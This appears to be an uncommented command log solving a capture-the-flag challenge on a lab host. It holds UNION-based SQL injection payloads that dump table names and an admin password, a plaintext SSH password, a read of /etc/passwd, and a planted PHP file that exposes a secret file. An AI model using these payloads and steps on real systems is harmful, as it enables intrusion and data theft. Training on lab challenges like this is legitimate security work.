# curl --silent --request POST --data "myusername=mu&mypassword=mp" http://ctf.notsosecure.com/71367217217126217712/checklogin.php | xxd -p -r ; echo
# cat console
# ./console
> ' and false union select table_name,null from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit 2,1 --
> ' and false union select column_name,null from information_schema.columns where table_name='users' limit 2,1 --
> ' and false union select password,null from users where name='admin' --
# curl --silent --cookie-jar nss --cookie nss --request POST --data 'myusername=admin&amypassword=sqlilabRocKs!!' "http://ctf.notsosecure.com/71367217217126217712/checklogin.php"
# curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" | grep -A 3 Success
# cat secret
# ./secret
> /etc/passwd
# ssh temp123@ctf.notsosecure.com
temp123@ctf.notsosecure.com's password:weakpassword1
$ find / -name secret.txt 2> /dev/null
$ cat /tmp/secret.txt
$ cat /secret.txt
$ ls -l /secret.txt
$ cat /home/temp123/.* | less
$ cd /var/www
$ ls -l
$ cd 71367217217126217712
$ ls -l
$ cat uber_secret.php
$ cat register.php
$ apachectl -M
$ cat /etc/apache2/mods-enabled/userdir.conf
$ cd /home/temp123
$ mkdir public_html
$ vi index.php
<?php echo file_get_contents('/secret.txt');
<ESC>:wq
$ exit
# curl --silent http://ctf.notsosecure.com/~temp123/index.php